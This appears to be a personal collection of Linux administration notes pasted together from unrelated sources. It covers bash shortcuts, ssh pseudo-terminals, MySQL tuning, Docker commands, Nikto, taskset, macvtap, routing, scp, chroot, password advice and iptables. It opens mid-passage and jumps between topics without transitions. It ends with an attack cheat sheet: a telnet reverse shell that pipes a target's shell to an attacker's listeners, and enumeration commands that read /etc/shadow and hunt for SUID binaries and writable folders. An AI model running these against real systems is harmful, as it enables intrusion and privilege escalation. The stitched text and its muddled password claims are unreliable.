For example, if you have a file named really_long_file_name in /home/chris/ and it’s the only file name starting with “r” in that directory, you can type /home/chris/r, press Tab, and bash will automatically fill in /home/chris/really_long_file_name for you. If you have multiple files or directories starting with “r”, bash will inform you of your possibilities. You can start typing one of them and press “Tab” to continue.
Working With Your Command History
You can quickly scroll through your recent commands, which are stored in your user account’s bash history file:
Ctrl+P or Up Arrow: Go to the previous command in the command history. Press the shortcut multiple times to walk back through the history.
Ctrl+N or Down Arrow: Go to the next command in the command history. Press the shortcut multiple times to walk forward through the history.
Alt+R: Revert any changes to a command you’ve pulled from your history if you’ve edited it.
Bash also has a special “recall” mode you can use to search for commands you’ve previously run:
Ctrl+R: Recall the last command matching the characters you provide. Press this shortcut and start typing to search your bash history for a command.
Ctrl+O: Run a command you found with Ctrl+R.
Ctrl+G: Leave history searching mode without running a command.
The primary difference is the concept of interactivity. It's similar to running commands locally inside of a script, vs. typing them out yourself. It's different in that a remote command must choose a default, and non-interactive is safest. (and usually most honest)
STDIN
If a PTY is allocated, applications can detect this and know that it's safe to prompt the user for additional input without breaking things. There are many programs that will skip the step of prompting the user for input if there is no terminal present, and that's a good thing. It would cause scripts to hang unnecessarily otherwise.
Your input will be sent to the remote server for the duration of the command. This includes control sequences. While a Ctrl-C break would normally cause a loop over the ssh command to break immediately, your control sequences will instead be sent to the remote server. This results in a need to "hammer" the keystroke to ensure that it arrives when control leaves the ssh command but before the next ssh command begins.
I would caution against using ssh -t in unattended scripts, such as crons. A non-interactive shell asking a remote command to behave interactively for input is asking for all kinds of trouble.
You can also test for the presence of a terminal in your own shell scripts. To test STDIN with newer versions of bash:
# fd 0 is STDIN
[ -t 0 ]; echo $?
STDOUT
When aliasing ssh to ssh -t, you can expect to get an extra carriage return in your line ends. It may not be visible to you, but it's there; it will show up as ^M when piped to cat -e. You must then expend the additional effort of ensuring that this control code does not get assigned to your variables, particularly if you're going to insert that output into a database.
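For instance, one hedged way to strip the extra carriage return before storing the output (the host and command are placeholders):
remote_kernel=$(ssh -t user@host 'uname -r' | tr -d '\r')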
There is also the risk that programs will assume they can render output that is not friendly for file redirection. Normally, if you were to redirect STDOUT to a file, the program would recognize that your STDOUT is not a terminal and omit any color codes. If the STDOUT redirection is from the output of the ssh client and there is a PTY associated with the remote end of the client, the remote programs cannot make such a distinction and you will end up with terminal garbage in your output file. Redirecting output to a file on the remote end of the connection should still work as expected.
Here is the same bash test as earlier, but for STDOUT:
# fd 1 is STDOUT
[ -t 1 ]; echo $?
While it's possible to work around these issues, you're inevitably going to forget to design scripts around them. All of us do at some point. Your team members may also not realize/remember that this alias is in place, which will in turn create problems for you when they write scripts that use your alias.
Aliasing ssh to ssh -t is very much a case where you'll be violating the design principle of least surprise; people will be encountering problems they do not expect and may not understand what is causing them.
SSH escape characters and transfer of binary files
One advantage that hasn’t been mentioned in the other answers is that when operating without a pseudo-terminal, the SSH escape characters such as ~C are not supported; this makes it safe for programs to transfer binary files which may contain these sequences.
Proof of concept
Copy a binary file using a pseudo-terminal:
$ ssh -t anthony@remote_host 'cat /usr/bin/free' > ~/free
Connection to remote_host closed.
Copy a binary file without using a pseudo-terminal:
$ ssh anthony@remote_host 'cat /usr/bin/free' > ~/free2
The two files aren’t the same:
$ diff ~/free*
Binary files /home/anthony/free and /home/anthony/free2 differ
The one which was copied with a pseudo-terminal is corrupted:
$ chmod +x ~/free*
$ ./free
Segmentation fault
while the other isn’t:
$ ./free2
total used free shared buffers cached
Mem: 2065496 1980876 84620 0 48264 1502444
-/+ buffers/cache: 430168 1635328
Swap: 4128760 112 4128648
Transferring files over SSH
This is particularly important for programs such as scp or rsync which use SSH for data transfer. This detailed description of how the SCP protocol works explains how the SCP protocol consists of a mixture of textual protocol messages and binary file data.
OpenSSH helps protect you from yourself
It’s worth noting that even if the -t flag is used, the OpenSSH ssh client will refuse to allocate a pseudo-terminal if it detects that its stdin stream is not a terminal:
$ echo testing | ssh -t anthony@remote_host 'echo $TERM'
Pseudo-terminal will not be allocated because stdin is not a terminal.
dumb
You can still force the OpenSSH client to allocate a pseudo-terminal with -tt:
$ echo testing | ssh -tt anthony@remote_host 'echo $TERM'
xterm
In either case, it (sensibly) doesn’t care if stdout or stderr are redirected:
8 GREAT MYSQL PERFORMANCE TIPS
You finished your brand new application, everything is working like a charm. Users are coming and using your web. Everybody is happy.
Then, suddenly, a big burst of users kills your MySQL server and your site is down. What went wrong? How can you prevent it?
Here are some tips on MySQL Performance which will help you and help your database.
THINK BIG
In the early stages of development you should be aware of the expected number of users coming to your application. If you expect many users, you should think big from the very beginning: plan for replication, scalability and performance.
But if you optimize your SQL code, schema and indexing strategy, maybe you will not need a big environment. Always think twice, as performance and scalability are not the same thing.
ALWAYS USE EXPLAIN
The EXPLAIN statement can be used either as a way to obtain information about how MySQL executes a SELECT statement or as a synonym for DESCRIBE.
When you precede a SELECT statement with the keyword EXPLAIN, MySQL displays information from the optimizer about the query execution plan. That is, MySQL explains how it would process the SELECT, including information about how tables are joined and in which order. EXPLAIN EXTENDED can be used to provide additional information.
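For example, against a hypothetical posts table with an index on post_status (table and column names are placeholders):
EXPLAIN SELECT id, post_title FROM posts WHERE post_status = 'publish';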
CHOOSE THE RIGHT DATA TYPE
Databases are typically stored on disk (with the exception of some, like MEMORY databases, which are stored in memory). This means that in order for the database to fetch information for you, it must read that information off the disk and turn it into a results set that you can use. Disk I/O is extremely slow, especially in comparison to other forms of data storage.
When your database grows to be large, the read time begins to take longer and longer. Poorly designed databases deal with this problem by allocating more space on the disk than they need. This means that the database occupies space on the disk that is being used inefficiently.
Picking the right data types can help by ensuring that the data we are storing makes the database as small as possible. We do this by selecting only the data types we need.
USE PERSISTENT CONNECTIONS
The reason behind using persistent connections is to reduce the number of connects, which are rather expensive, even though they are much faster with MySQL than with most other databases.
There is some debate on the web on this topic, and the mysqli extension has disabled the persistent connection feature, so I will not write much more about it. The only downside of persistent connections is that if you have many concurrent connections, the max_connections setting could be reached. This is easily changed in the Apache settings, so I don't think it is a reason not to use persistent connections.
Persistent connections are particularly useful if you have the DB server on another machine. Because of the mentioned downside, use them wisely.
LEARN ABOUT QUERY CACHE
The query cache stores the text of a SELECT statement together with the corresponding result that was sent to the client. If an identical statement is received later, the server retrieves the results from the query cache rather than parsing and executing the statement again. The query cache is shared among sessions, so a result set generated by one client can be sent in response to the same query issued by another client.
The query cache can be useful in an environment where you have tables that do not change very often and for which the server receives many identical queries. This is a typical situation for many Web servers that generate many dynamic pages based on database content.
The query cache does not return stale data. When tables are modified, any relevant entries in the query cache are flushed.
How do you find out whether your MySQL query cache is working or not?
MySQL provides these stats; just type the following command at the mysql> prompt:
mysql> show variables like 'query%';
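To see whether the cache is actually being hit (as opposed to just being configured), the server status counters can also be checked:
mysql> show status like 'Qcache%';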
DO NOT USE INDEXED COLUMN IN A FUNCTION
An index on a column can be a great performance gain, but if you use that column inside a function, the index is never used.
Always try to rewrite the query so that it does not apply a function to the indexed column.
WHERE TO_DAYS(CURRENT_DATE) - TO_DAYS(event_date) <= 7
could be
WHERE event_date >= '2011/03/15' - INTERVAL 7 DAY
and today’s date is generated from PHP. This way, index on column event_date is used and the query can be stored inside Query Cache.
LEARN THE ZEN OF SQL CODING
SQL code is the foundation for optimizing database performance. Master SQL coding techniques like rewriting subquery SQL statements to use JOINS, eliminating cursors with JOINS and similar.
By writing great SQL code your database performance will be great.
USE ON DUPLICATE KEY UPDATE
If you specify ON DUPLICATE KEY UPDATE, and a row is inserted that would cause a duplicate value in a UNIQUE index or PRIMARY KEY, an UPDATE of the old row is performed.
INSERT INTO wordcount (word, count)
VALUES ('a_word',1)
ON DUPLICATE KEY UPDATE count=count+1;
You are saving one trip to the server (SELECT then UPDATE), and cleaning your code up by removing all the "if record exists then update else insert" logic.
If you follow some of these tips, your database will be grateful to you.
The service --status-all command tries to figure out for every init script in /etc/init.d if it supports a status command (by grepping the script for status).
If it doesn't find that string it will print [ ? ] for that service.
Otherwise it will run /etc/init.d/$application status.
If the return code is 0 it prints [ + ].
If it's not 0 it prints [ - ].
Why does ssh print [ - ] even though it's still running?
ssh is controlled by upstart in Ubuntu (13.10).
Running /etc/init.d/ssh status will produce no output and a return code of 1.
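On an upstart-managed service you can query upstart directly instead; a hedged example:
$ status ssh
which should report the job as start/running along with its PID.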
docker attach : Attach local standard input, output, and error streams to a running container
docker build : Build an image from a Dockerfile
docker checkpoint : Manage checkpoints
docker commit : Create a new image from a container's changes
docker config : Manage Docker configs
docker container : Manage containers
docker cp : Copy files/folders between a container and the local filesystem
docker create : Create a new container
docker deploy : Deploy a new stack or update an existing stack
docker diff : Inspect changes to files or directories on a container's filesystem
docker events : Get real time events from the server
docker exec : Run a command in a running container
docker export : Export a container's filesystem as a tar archive
docker history : Show the history of an image
docker image : Manage images
docker images : List images
docker import : Import the contents from a tarball to create a filesystem image
docker info : Display system-wide information
docker inspect : Return low-level information on Docker objects
docker kill : Kill one or more running containers
docker load : Load an image from a tar archive or STDIN
docker login : Log in to a Docker registry
docker logout : Log out from a Docker registry
docker logs : Fetch the logs of a container
docker manifest : Manage Docker image manifests and manifest lists
docker network : Manage networks
docker node : Manage Swarm nodes
docker pause : Pause all processes within one or more containers
docker plugin : Manage plugins
docker port : List port mappings or a specific mapping for the container
docker ps : List containers
docker pull : Pull an image or a repository from a registry
docker push : Push an image or a repository to a registry
docker rename : Rename a container
docker restart : Restart one or more containers
docker rm : Remove one or more containers
docker rmi : Remove one or more images
docker run : Run a command in a new container
docker save : Save one or more images to a tar archive (streamed to STDOUT by default)
docker search : Search the Docker Hub for images
docker secret : Manage Docker secrets
docker service : Manage services
docker stack : Manage Docker stacks
docker start : Start one or more stopped containers
docker stats : Display a live stream of container(s) resource usage statistics
docker stop : Stop one or more running containers
docker swarm : Manage Swarm
docker system : Manage Docker
docker tag : Create a tag TARGET_IMAGE that refers to SOURCE_IMAGE
docker top : Display the running processes of a container
docker trust : Manage trust on Docker images
docker unpause : Unpause all processes within one or more containers
docker update : Update configuration of one or more containers
docker version : Show the Docker version information
docker volume : Manage volumes
docker wait : Block until one or more containers stop, then print their exit codes
What is Nikto?
It is a web vulnerability scanner written in Perl and released under the GPL. It lets you test the security of your web server's configuration (HTTP options, indexes, potential XSS flaws, SQL injections, etc.).
Disclaimer
Use it only on your own servers. The scan is noisy and generates dozens of log lines with your IP in the Apache logs or in any IDS. The point is to find flaws at home so we can secure our own web servers as well as possible.
Installing the script
It ships by default with the KALI distribution. Here I will install it on my Raspbian box, which hosts an Apache web server.
Version Nikto v2.1.6 is available on GitHub:
Multi-host scan
It is possible to scan a range of web server addresses. Nikto can read from its standard input, so we feed it the result of an nmap scan:
nmap -p80 192.168.0.0/24 -oG - | ./nikto.pl -h -
Verbose and debug scan
Add the -D -v option. Reusing the previous example, that gives:
./nikto.pl -h [URL] -p 8080,80,443 -D -v
Behind a proxy
sudo vim /nikto-master/program/nikto.conf
Specify the proxy:
# Proxy settings -- still must be enabled by -useproxy
PROXYHOST= ip_or_url_of_the_proxy
PROXYPORT=8080
#PROXYUSER=proxyuserid
#PROXYPASS=proxypassword
Test the scan with the proxy configured above:
./nikto.pl -h [URL] -useproxy
Understanding some of the findings
Let's start from the plain result of the command:
I strongly suggest using paccache instead of pacman -Sc. There is even a very effective flag, -u, for selectively removing the cached versions of uninstalled packages. The paccache flags I recommend are (as of paccache v5.0.2):
pacman -Sy pacman-contrib
-d, --dryrun: perform a dry run, only finding candidate packages
-r, --remove: remove candidate packages
-u, --uninstalled: target uninstalled packages only
-k, --keep <num>: keep <num> versions of each package in the cache (default: 3)
Example: Check for remaining cache versions of uninstalled packages
paccache -dvuk0
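To actually remove those leftover versions after reviewing the dry run:
paccache -ruk0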
Open Chrome.
Type chrome://flags in the address bar and hit the Enter key.
Press Ctrl+F and look for Strict Site Isolation.
Click Enable to turn the feature ON.
As you click Enable, a Relaunch Now button will appear.
Relaunch Chrome to make the changes take effect. The browser will relaunch with all your tabs open.
Enable Strict Site Isolation by changing the Target
Right-click the Chrome icon and select Properties.
Under the Shortcut tab, in the ‘Target’ field, append --site-per-process after the closing quotation mark, separated by a space.
So the target should now appear as:
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --site-per-process
ssh-keygen -t rsa
The best algorithm nowadays is ed25519, for example:
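A sketch of generating an ed25519 key pair instead of RSA (the -C comment is optional):
ssh-keygen -t ed25519 -C "your_email@example.com"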
Enter file in which to save the key (/home/exemple/.ssh/
ssh-copy-id user@123.45.56.78
Or
cat ~/.ssh/id_rsa.pub | ssh user@123.45.56.78 "mkdir -p ~/.ssh && cat >> ~/.ssh/authorized_keys"
To retrieve the CPU affinity information of a process, use the following format. taskset returns the current CPU affinity in a hexadecimal bitmask format.
taskset -p [pid]
For example, to check the CPU affinity of a process with PID 2915:
$ taskset -p 2915
pid 2915's current affinity mask: ff
In this example, the returned affinity (represented in a hexadecimal bitmask) corresponds to "11111111" in binary format, which means the process can run on any of eight different CPU cores (from 0 to 7).
The lowest bit in a hexadecimal bitmask corresponds to core ID 0, the second lowest bit from the right to core ID 1, the third lowest bit to core ID 2, etc. So for example, a CPU affinity of "0x11" represents CPU cores 0 and 4.
taskset can show CPU affinity as a list of processors instead of a bitmask, which is easier to read. To use this format, run taskset with "-c" option. For example:
$ taskset -cp 2915
pid 2915's current affinity list: 0-7
Pin a Running Process to Particular CPU Core(s)
Using taskset, you can "pin" (or assign) a running process to particular CPU core(s). For that, use the following format.
$ taskset -p [mask] [pid]
$ taskset -cp [core-list] [pid]
For example, to assign a process to CPU core 0 and 4, do the following.
$ taskset -p 0x11 9030
pid 9030's current affinity mask: ff
pid 9030's new affinity mask: 11
Or equivalently:
$ taskset -cp 0,4 9030
With "-c" option, you can specify a list of numeric CPU core IDs separated by commas, or even include ranges (e.g., 0,2,5,6-10).
Note that in order to be able to change the CPU affinity of a process, a user must have CAP_SYS_NICE capability. Any user can view the affinity mask of a process.
Launch a Program on Specific CPU Cores
taskset also allows you to launch a new program as pinned to specific CPU cores. For that, use the following format.
taskset [mask] [command] [arguments]
For example, to launch the vlc program on CPU core 0, use the following command.
$ taskset 0x1 vlc
Dedicate a Whole CPU Core to a Particular Program
While taskset allows a particular program to be assigned to certain CPUs, that does not mean that no other programs or processes will be scheduled on those CPUs. If you want to prevent this and dedicate a whole CPU core to a particular program, you can use "isolcpus" kernel parameter, which allows you to reserve the CPU core during boot.
Add the kernel parameter "isolcpus=" at boot time or in the GRUB configuration file. The Linux scheduler will then not schedule any regular process on the reserved CPU core(s), unless specifically requested with taskset. For example, to reserve CPU cores 0 and 1, add the "isolcpus=0,1" kernel parameter. After the reboot, use taskset to safely assign the reserved CPU cores to your program.
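A sketch, assuming a GRUB-based system and that cores 0 and 1 should be reserved (the program name is a placeholder):
# /etc/default/grub
GRUB_CMDLINE_LINUX_DEFAULT="... isolcpus=0,1"
# regenerate the GRUB config (update-grub on Debian-based systems) and reboot
grub-mkconfig -o /boot/grub/grub.cfg
# after the reboot, pin your program to the reserved cores
taskset -c 0,1 ./my_program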
Macvtap is a new device driver meant to simplify virtualized bridged networking. It replaces the combination of the tun/tap and bridge drivers with a single module based on the macvlan device driver. A macvtap endpoint is a character device that largely follows the tun/tap ioctl interface and can be used directly by kvm/qemu and other hypervisors that support the tun/tap interface. The endpoint extends an existing network interface, the lower device, and has its own mac address on the same ethernet segment. Typically, this is used to make both the guest and the host show up directly on the switch that the host is connected to.
VEPA, Bridge and private mode
Like macvlan, any macvtap device can be in one of three modes, defining the communication between macvtap endpoints on a single lower device:
Virtual Ethernet Port Aggregator (VEPA), the default mode: data from one endpoint to another endpoint on the same lower device gets sent down the lower device to external switch. If that switch supports the hairpin mode, the frames get sent back to the lower device and from there to the destination endpoint.
Most switches today do not support hairpin mode, so the two endpoints are not able to exchange ethernet frames, although they might still be able to communicate through a TCP/IP router. A Linux host used as the adjacent bridge can be put into hairpin mode by writing to /sys/class/net/<bridge>/brif/<port>/hairpin_mode. This mode is particularly interesting if you want to manage the virtual machine networking at the switch level. A switch that is aware of the VEPA guests can enforce filtering and bandwidth limits per MAC address without the Linux host knowing about it.
Bridge, connecting all endpoints directly to each other. Two endpoints that are both in bridge mode can exchange frames directly, without the round trip through the external bridge. This is the most useful mode for setups with classic switches, and when inter-guest communication is performance critical.
For completeness, a private mode exists that behaves like a VEPA mode endpoint in the absence of a hairpin aware switch. Even when the switch is in hairpin mode, a private endpoint can never communicate to any other endpoint on the same lowerdev.
Setting up macvtap
A macvtap interface is created and configured using the ip link command from iproute2, in the same way as we configure macvlan or veth interfaces.
Example:
$ ip link add link eth1 name macvtap0 type macvtap
$ ip link set macvtap0 address 1a:46:0b:ca:bc:7b up
$ ip link show macvtap0
12: macvtap0@eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN
link/ether 1a:46:0b:ca:bc:7b brd ff:ff:ff:ff:ff:ff
At the same time, a character device gets created by udev. Unless configured otherwise, udev names this device /dev/tapN, with N corresponding to the interface index number of the new macvtap endpoint, in the above example '12'. Unlike tun/tap, the character device represents only a single network interface, and we can give its ownership to the user or group that we want to be able to use the new tap. Configuring the MAC address of the endpoint is important, because this address is used on the external network; the guest is not able to spoof or change that address and has to be configured with the same address.
Qemu on macvtap
Qemu as of 0.12 does not have direct support for macvtap, so we have to (ab)use the tun/tap configuration interface. To start a guest on the interface from the above example, we need to pass the device node as an open file descriptor to qemu and tell it about the mac address. The scripts normally used for bridge configuration must be disabled. A bash redirect can be used to open the character device in read/write mode and pass it as file descriptor 3.
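A minimal sketch of such an invocation, assuming the macvtap0 endpoint created above (interface index 12, so the character device is /dev/tap12) and a hypothetical disk image disk.img:
qemu-system-x86_64 -hda disk.img \
  -net nic,model=virtio,macaddr=1a:46:0b:ca:bc:7b \
  -net tap,fd=3 3<>/dev/tap12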
Print kernel IP routing table : route
Add a default gateway : route add default gw 192.168.1.10
Kernel IP routing cache : route -Cn
3 methods to reject a host (nullroute):
route add -host 192.168.1.51 reject
route add 65.21.34.4 gw 127.0.0.1 lo
ip route add blackhole 202.54.5.2
3 methods to reject a network (nullroute):
route add -net 192.168.1.0 netmask 255.255.255.0 reject
route add -net 65.21.0.0/16 gw 127.0.0.1 lo
ip route add blackhole 202.54.5.2/29
Add a route for a network : ip route add 172.1.0.0/16 via 10.0.0.25
Show the routing table : ip route show
Adding a bridge : ip link add name bridge_name type bridge
Set up : ip link set bridge_name up
Set eth0 as master : ip link set eth0 master bridge_name
Unset eth0 as master : ip link set eth0 nomaster
Copy one single file from a remote server to another remote server
With scp you can copy files between remote servers from a third server without the need to ssh into any of them; all the heavy lifting is done by scp itself.
This time, you will be copying from one host to the same host, but into different folders under the control of different users.
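A sketch with placeholder hosts, users and paths:
# remote server to remote server
scp user1@remote1.example.com:/home/user1/file.txt user2@remote2.example.com:/home/user2/
# same host, different users and folders
scp jane@server.example.com:/home/jane/file.txt john@server.example.com:/home/john/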
Copy multiple files with one command
You can copy multiple files at once without having to copy all the files in a folder, or copy multiple files from different folders putting them in a space separated list.
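For example (a sketch with placeholder file names):
scp /home/jane/file1.txt /var/log/app.log user@server:/home/jane/backup/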
You can also copy all files of a given extension to the remote server. For instance, to copy all your text files (txt extension) to a new folder:
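A sketch with placeholder paths:
scp /home/jane/*.txt user@server:/home/jane/backup/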
To copy a whole folder recursively, use the -r option; see the sketch below. The result on the remote server will be /home/jane/backup/html/...: the whole html folder and its contents have been copied recursively.
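The recursive copy that produces that layout might look like this (placeholder paths):
scp -r /home/jane/html user@server:/home/jane/backup/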
Tips
We have seen the basic uses of scp; now we will see some special uses and tricks of this great command.
Increase Speed
scp uses AES-128 to encrypt data; this is very secure, but also a little bit slow. If you need more speed while keeping some security, you can use Blowfish or RC4.
To increase scp speed, change the cipher from the default AES-128 to Blowfish:
scp -c blowfish user@server:/home/user/file .
Or use RC4 (arcfour), which seems to be the fastest:
scp -c arcfour user@server:/home/user/file .
This last one is not very secure and should not be used if security is really an issue for you (note that recent OpenSSH releases have removed these legacy ciphers altogether).
Increase Security
If security is what you want, you can increase it; you will lose some speed, though.
scp -c 3des user@server:/home/user/file .
Limit Bandwidth
You may limit the bandwidth used by the scp command:
scp -l limit username@server:/home/username/* .
Where limit is specified in Kbit/s. So, for example, to limit the speed to 50 Kbit/s:
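A sketch with placeholder names:
scp -l 50 username@server:/home/username/* .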
Using the capital letter P, you can make scp use a port other than 22, which is the default for ssh. Let's say your remote server is listening on port 2222:
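For example (placeholder host and path):
scp -P 2222 user@server:/home/user/file .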
If you want to see what is happening under the hood, use the -v parameter for a verbose output
scp -v user@server:/home/jane/file /home/jane/
Windows
If you are working on a Windows-powered computer, you can still enjoy scp in various ways; of course, if you are a "*nix guy" you will prefer the command line, but GUI tools are also available.
pscp
pscp is a command-line tool that works in the Windows shell almost the same way that scp works on Linux or Mac OS X. You first need to download it from the PuTTY download page.
Once downloaded, you can invoke it from the Windows command line. Go to the Start menu, click Run, then type
cmd
and press ENTER. If you are on Windows 8.x, hit the Windows/Super key, click on the magnifier lens, type cmd and hit ENTER.
Once in the command line, make sure you are in the directory where the pscp file was downloaded, or add that folder to your PATH. Supposing the folder is your Downloads folder, run this command:
SET PATH=C:\Users\Guillermo\Downloads;%PATH%
You will have to run that command every time you open a new command shell, or you can add the path permanently; how to do that is out of the scope of this article.
Below are the options of the command; you will see that they let you do almost everything.
PuTTY Secure Copy client
Release 0.63
Usage: pscp [options] [user@]host:source target
pscp [options] source [source...] [user@]host:target
pscp [options] -ls [user@]host:filespec
Options:
-V print version information and exit
-pgpfp print PGP key fingerprints and exit
-p preserve file attributes
-q quiet, don't show statistics
-r copy directories recursively
-v show verbose messages
-load sessname Load settings from saved session
-P port connect to specified port
-l user connect with specified username
-pw passw login with specified password
-1 -2 force use of particular SSH protocol version
-4 -6 force use of IPv4 or IPv6
-C enable compression
-i key private key file for authentication
-noagent disable use of Pageant
-agent enable use of Pageant
-batch disable all interactive prompts
-unsafe allow server-side wildcards (DANGEROUS)
-sftp force use of SFTP protocol
-scp force use of SCP protocol
Copy files from Windows to Linux
You can use the pscp command to copy files from Windows to Linux (and back).
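A sketch with a placeholder host and paths:
pscp C:\Users\Guillermo\Downloads\file.txt user@server:/home/user/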
Sometimes you will have problems with the laptop lid open/close behaviour.
Edit /etc/systemd/logind.conf and make sure you have:
HandleLidSwitch=ignore
You can replace ignore with suspend or poweroff; the ignore value
will make logind ignore the lid being closed. (You may need to also undo any other changes you've made.)
Then, you'll want to reload logind.conf to make your changes go into effect (thanks to Ehtesh Choudhury for pointing this out in the comments):
systemctl restart systemd-logind
Full details over at the archlinux Wiki.
The man page for logind.conf also has the relevant information,
Controls whether logind shall handle the system power and sleep
keys and the lid switch to trigger actions such as system power-off
or suspend. Can be one of ignore, poweroff, reboot, halt, kexec,
suspend, hibernate, hybrid-sleep and lock. If ignore logind will
never handle these keys. If lock all running sessions will be
screen locked. Otherwise the specified action will be taken in the
respective event. Only input devices with the power-switch udev tag
will be watched for key/lid switch events. HandlePowerKey=
defaults to poweroff. HandleSuspendKey= and HandleLidSwitch=
default to suspend. HandleHibernateKey= defaults to hibernate.
Create the symfony folder containing the whole website (generally in /var/www).
First change ownership to a non-admin/non-sudo user:
# sudo chown -R user:user /var/www/symfony
Allow the user www-data access to the files inside the application folder. Give this user a read + execute permission (rX) in the whole directory.
# sudo setfacl -R -m u:www-data:rX symfony
Give read + write + execute permissions (rwX) to the user www-data in order to enable the web server to write only in these directories.
# sudo setfacl -R -m u:www-data:rwX symfony/var/cache symfony/var/logs
Finally, we will define that all new files created inside the var/cache and var/logs folders follow the same permission scheme we just defined, with read, write, and execute permissions for the web server user. This is done by repeating the setfacl command we just ran, this time adding the -d option, as in the sketch below.
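A sketch of that default-ACL variant, using the same paths as above:
sudo setfacl -dR -m u:www-data:rwX symfony/var/cache symfony/var/logs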
prepare the folder :
mount /device/to/chroot /chroot/point
If necessary :
mount /device/of/boot /chroot/point/boot
export PATH="$PATH:/usr/sbin:/sbin:/bin"
cd /location/of/new/root
# mount -t proc proc proc/
# mount --rbind /sys sys/
# mount --rbind /dev dev/
And optionally:
# mount --rbind /run run/
Next, in order to use an internet connection in the chroot environment copy over the DNS details:
# cp /etc/resolv.conf etc/resolv.conf
Finally, to change root into /location/of/new/root using a bash shell:
As a User
#chroot /chroot /bin/su - user
#chroot --userspec=user:user --groups=group1 /chroot /bin/bash
As Root
# chroot /location/of/new/root /bin/bash
export PATH="$PATH:/usr/sbin:/sbin:/bin"
# xhost +local:
# echo $DISPLAY
as the user that owns the X server to see the value of DISPLAY. If the value is ":0" (for example), then in the chroot environment run export DISPLAY=:0 before starting graphical applications.
What is a weak password?
String_7878
that's a weak password :
-> Upper case at the beginning
-> Short
-> Number at the end
-> Some tools like Hydra or hashcat can crack this in seconds with a rainbow table
A good password is made of random characters:
kfkq8H@_-0-POlkcwr
advantages :
-> Hard to crack online
-> Long
-> No upper case at the beginning
-> No number at the end
-> Require a lot of computer power to crack
-> Has to be brute forced; it won't fall to dictionary attacks
that's good but not perfect :
-> Hard to remember
-> Hard to type
-> Not really future proof
A perfect password looks like:
nOOdles_in_@_cup_thats_marv3l0us
Why :
-> It's long
-> No upper case at the beginning
-> Special chars
-> No Number at the end
-> Easy to type
-> Easy to remember
-> Plus, if you can write it in a language other than English, it's even harder to crack
-> Future proof
-> Hard to crack offline and online
-D: Tells SSH that we want a SOCKS tunnel on the specified port number (you can choose a number between 1025-65536)
-f: Forks the process to the background
-C: Compresses the data before sending it
-q: Uses quiet mode
-N: Tells SSH that no command will be sent once the tunnel is up
-L: local port forwarding (listen on the local machine)
-R: remote port forwarding (listen on the server)
-p: port of the sshd on the remote machine
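A few sketches combining these flags (hosts and ports are placeholders):
ssh -D 8123 -f -C -q -N user@example.com      # SOCKS proxy listening on local port 8123
ssh -L 8080:localhost:80 user@example.com     # forward local port 8080 to port 80 on the server
ssh -R 9090:localhost:3000 user@example.com   # expose local port 3000 as port 9090 on the server
ssh -p 2222 user@example.com                  # connect to an sshd listening on port 2222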
### Flush, append a few rules, then drop & save ###
iptables -F
iptables -A INPUT -p tcp --tcp-flags ALL NONE -j DROP
iptables -A INPUT -p tcp ! --syn -m state --state NEW -j DROP
iptables -A INPUT -p tcp --tcp-flags ALL ALL -j DROP
iptables -A INPUT -i lo -j ACCEPT
iptables -A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
iptables -I INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P INPUT DROP
/sbin/iptables -A OUTPUT -p tcp --dport {PORT-NUMBER-HERE} -j DROP
### interface section, use eth1 ###
/sbin/iptables -A OUTPUT -o eth1 -p tcp --dport {PORT-NUMBER-HERE} -j DROP
### only drop port for given IP or Subnet ##
/sbin/iptables -A OUTPUT -o eth0 -p tcp --destination-port {PORT-NUMBER-HERE} -s {IP-ADDRESS-HERE} -j DROP
/sbin/iptables -A OUTPUT -o eth0 -p tcp --destination-port {PORT-NUMBER-HERE} -s {IP/SUBNET-HERE} -j DROP
/sbin/iptables -A OUTPUT -p tcp -d 192.168.1.2 --dport 1234 -j DROP
/sbin/service iptables save
# Logging #
### If you would like to log dropped packets to syslog, first log it ###
/sbin/iptables -A INPUT -m limit --limit 5/min -j LOG --log-prefix "PORT 80 DROP: " --log-level 7
### now drop it ###
/sbin/iptables -A INPUT -p tcp --destination-port 80 -j DROP
/sbin/iptables -A INPUT -s 123.1.2.3 -i eth1 -p udp -m state --state NEW -m udp --dport 161 -j DROP
# drop students 192.168.1.0/24 subnet to port 80
/sbin/iptables -A INPUT -s 192.168.1.0/24 -i eth1 -p tcp -m state --state NEW -m tcp --dport 80 -j DROP
nc -lvp 4444   # Attacker: input (commands)
nc -lvp 4445   # Attacker: output (results)
telnet [attackers ip] 4444 | /bin/sh | telnet [attackers ip] 4445   # On the target system; use the attacker's IP
Users, rights, superpowers, mail
id
whoami
w
last
cat /etc/passwd | cut -d: -f1                                 # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'   # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd                     # List of super users
cat /etc/sudoers
sudo -l
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/
ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null    # Anyone
ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null      # Owner
ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null   # Group
ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null       # Other
find /etc/ -readable -type f 2>/dev/null               # Anyone
find /etc/ -readable -type f -maxdepth 1 2>/dev/null   # Anyone
find / -perm -1000 -type d 2>/dev/null   # Sticky bit - only the owner of the directory or the owner of a file can delete or rename here
find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) - run as the group, not the user who started it
find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) - run as the owner, not the user who started it
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null   # SGID or SUID
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done   # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (quicker search)
# find starting at root (/), SGID or SUID, not symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
find / -writable -type d 2>/dev/null    # world-writeable folders
find / -perm -222 -type d 2>/dev/null   # world-writeable folders
find / -perm -o+w -type d 2>/dev/null   # world-writeable folders
find / -perm -o+x -type d 2>/dev/null   # world-executable folders
